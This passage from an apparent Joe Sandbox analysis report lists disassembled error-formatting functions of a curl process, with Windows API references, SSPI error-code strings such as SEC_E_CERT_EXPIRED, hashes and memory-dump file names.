String ID: %s (0x%08X)$%s - %s$SEC_E_MESSAGE_ALTERED
API String ID: 1435330505-4174774321
Opcode ID: c2e9f8d4970fe8280d0de53a0b398aaf4d994befed7486f487b87f83eafbc6c9
Instruction ID: 8af46d3ec9bda835d58200ae3fb1d09b1d8a4966e79d146f2222c375e0e9a755
Opcode Fuzzy Hash: c2e9f8d4970fe8280d0de53a0b398aaf4d994befed7486f487b87f83eafbc6c9
Instruction Fuzzy Hash: 28115A35B14B4086E6619F20E4047DF7365F788B51F80413AEA8A42B96DF3CCA4BC710

Function 000000013F49ED95 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059
SEC_E_MULTIPLE_ACCOUNTS, xrefs: 000000013F49ED95

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_MULTIPLE_ACCOUNTS
API String ID: 1435330505-531237286
Opcode ID: 88cc65a7bc263d0da757b9c16bc81612ee8c4f3d4b062dc1a3e0aba14bf6eee3
Instruction ID: 56283aa9d41eb1792282dcab7c0a0b3c17e2b2f8bc7c1ea8d7343f9b7b62d3d2
Opcode Fuzzy Hash: 88cc65a7bc263d0da757b9c16bc81612ee8c4f3d4b062dc1a3e0aba14bf6eee3
Instruction Fuzzy Hash: 3C112A35B14B4096E6619F20E4047DF7365F788B51F85413AEA8A42B96DF3CCA4BC750

Function 000000013F49EC2D Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

SEC_E_CANNOT_INSTALL, xrefs: 000000013F49EC2D
%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_CANNOT_INSTALL
API String ID: 1435330505-2628789574
Opcode ID: fd10da4310bec428fa8df86127f791fb119ff3b3588069eb0d240343dd530814
Instruction ID: e882632a1662cf31ef41579751a64b3aea01867da956c1685cb2b707db37530a
Opcode Fuzzy Hash: fd10da4310bec428fa8df86127f791fb119ff3b3588069eb0d240343dd530814
Instruction Fuzzy Hash: 53112A35B14B4096E661AF20E4047DF7365FB88B51F85413AEA8A42B96DF3CCA4BC750

Function 000000013F49EC21 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059
SEC_E_BUFFER_TOO_SMALL, xrefs: 000000013F49EC21

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_BUFFER_TOO_SMALL
API String ID: 1435330505-1965992168
Opcode ID: 6a42a592e6e0b22ff36b40e127086da92e25e084003e4c2e606844b3088ec4d5
Instruction ID: 8ad93c02a57ca1500563871e20de2e9f613af9d8c3287dbd0980eb8dc096f781
Opcode Fuzzy Hash: 6a42a592e6e0b22ff36b40e127086da92e25e084003e4c2e606844b3088ec4d5
Instruction Fuzzy Hash: 48115A31B14B4086E6619F20E4047DF7365F788B91F80413AEA8A42B96DF3CCA4BC750

Function 000000013F49EC39 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059
SEC_E_CANNOT_PACK, xrefs: 000000013F49EC39

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_CANNOT_PACK
API String ID: 1435330505-1502336670
Opcode ID: 3d75235f3c568a5d41d28b0cdd34350df6baf9ae75e8372f00a15255d58dccb4
Instruction ID: c0dd635bc49b090fe7fbacda4e9fe5d91d96d5ca31ba63d872552882e0e9c1ab
Opcode Fuzzy Hash: 3d75235f3c568a5d41d28b0cdd34350df6baf9ae75e8372f00a15255d58dccb4
Instruction Fuzzy Hash: 34112A35B14B4096E6A19F20E4047DF7365F788B51F85413AEA8A42B96DF3CCA4BC750

Function 000000013F49EC45 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059
SEC_E_CERT_EXPIRED, xrefs: 000000013F49EC45

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_CERT_EXPIRED
API String ID: 1435330505-3862749013
Opcode ID: 88de8354579e04ee29edc09b03b878f79f5a612902c9ab28cd79dd6bfbce5d0b
Instruction ID: ff5588cdd63f99ee3b1c4c05d7422bcb5f81b6d8753b64b8b13d005f06aeefc3
Opcode Fuzzy Hash: 88de8354579e04ee29edc09b03b878f79f5a612902c9ab28cd79dd6bfbce5d0b
Instruction Fuzzy Hash: CC112A35B14B4096E661AF20E4047DF7365F788B51F85413AEA8A42B96DF3CCA4BC750

Function 000000013F49EC5D Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059
SEC_E_CERT_WRONG_USAGE, xrefs: 000000013F49EC5D

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_CERT_WRONG_USAGE
API String ID: 1435330505-580453001
Opcode ID: ce792466191a31168fd5d1624b547cb1894e0de980c79da1f368eb6b839474ed
Instruction ID: 0a390126ed549f163f8f7acf4d31a73f8b3be00473d2b10decab175102bf461a
Opcode Fuzzy Hash: ce792466191a31168fd5d1624b547cb1894e0de980c79da1f368eb6b839474ed
Instruction Fuzzy Hash: 9E112A35B14B4096E6619F20E4047DF7365F788B51F85413AEA8A42B96DF3CCA4BC750

Function 000000013F49EC51 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

SEC_E_CERT_UNKNOWN, xrefs: 000000013F49EC51
%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_CERT_UNKNOWN
API String ID: 1435330505-1381340633
Opcode ID: daf07e83d593dc362a7ab3eb46dc30fcd452bd0328cd0cc7b538d4fa76b2a8e0
Instruction ID: 9f2333190dd0fa8fab8b7feef116ca9aa0ba3a4ebd16be0fdda1c306c07980d5
Opcode Fuzzy Hash: daf07e83d593dc362a7ab3eb46dc30fcd452bd0328cd0cc7b538d4fa76b2a8e0
Instruction Fuzzy Hash: F3112A35B14B4096E6619F20E4047DF7365F788B51F85413AEA8E42B96DF3CCA4BC750

Function 000000013F49EBFD Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059
SEC_E_ALGORITHM_MISMATCH, xrefs: 000000013F49EBFD

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_ALGORITHM_MISMATCH
API String ID: 1435330505-618797061
Opcode ID: c2b8f0d1e5ccba64c32f0a624bcc3729056efbf001cde90110e6ac243a037f36
Instruction ID: 1621a1d1f67b5159cd58b662a2468f179c286fa6fe1652d44a2b0e3e7ded947d
Opcode Fuzzy Hash: c2b8f0d1e5ccba64c32f0a624bcc3729056efbf001cde90110e6ac243a037f36
Instruction Fuzzy Hash: 7C115A35B14B4086E661AF20E4047DF7365F788B51F80413AEA8E42B96DF3CCA4BC750

Function 000000013F49EC09 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

%s (0x%08X), xrefs: 000000013F49F00C
SEC_E_BAD_BINDINGS, xrefs: 000000013F49EC09
%s - %s, xrefs: 000000013F49F059

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_BAD_BINDINGS
API String ID: 1435330505-2710416593
Opcode ID: 6804147e1eb312475d8e902baecbab68306308189effb1bc71cef56ee18b6ff5
Instruction ID: 450ec72dcf14df80b973a13e2d651efa9fff822a3fcd2fe70bd4c29f75a5696e
Opcode Fuzzy Hash: 6804147e1eb312475d8e902baecbab68306308189effb1bc71cef56ee18b6ff5
Instruction Fuzzy Hash: E7115A31B14B4086E661AF20E4047DF7365F788B51F81413AEA8A42B96DF3CCA4BC750

Function 000000013F49EC15 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

SEC_E_BAD_PKGID, xrefs: 000000013F49EC15
%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_BAD_PKGID
API String ID: 1435330505-1052566392
Opcode ID: bc30fd3f4a3bc19e710b9030b16e57e997d887bcacf9363450b4ec3e4d17485e
Instruction ID: 55e12ec0d08f200ba82371bca86b9a201441c8d5b304b8a668555b83bad44e76
Opcode Fuzzy Hash: bc30fd3f4a3bc19e710b9030b16e57e997d887bcacf9363450b4ec3e4d17485e
Instruction Fuzzy Hash: 56115A31B14B4086E6619F20E4047DF7365F788B51F80413AEA8A42B96DF3CCA4BC750

Function 000000013F49ECA5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059
SEC_E_DELEGATION_REQUIRED, xrefs: 000000013F49ECA5

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_DELEGATION_REQUIRED
API String ID: 1435330505-1475363564
Opcode ID: 130e6a446de66eca2d589899456355e79c5de7575e6b52e0601625ad88b0dbe6
Instruction ID: deceedacf5ac350fea8296e10bc35939aa816e649cdc5f39bb9072416da68e79
Opcode Fuzzy Hash: 130e6a446de66eca2d589899456355e79c5de7575e6b52e0601625ad88b0dbe6
Instruction Fuzzy Hash: E6112A35B14B4096E6619F20E4047DF7365F788B51F85413AEA8A42B96DF3CCA4BC750

Function 000000013F49ECBD Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

SEC_E_ENCRYPT_FAILURE, xrefs: 000000013F49ECBD
%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_ENCRYPT_FAILURE
API String ID: 1435330505-3602081711
Opcode ID: a069910b7e16112447585ca2bf66f6aef3820300fc95228b938ef203b0afdc6f
